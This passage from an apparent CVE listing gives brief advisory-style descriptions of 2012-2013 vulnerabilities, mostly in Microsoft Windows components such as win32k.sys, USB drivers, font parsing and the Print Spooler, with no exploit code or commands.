Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race 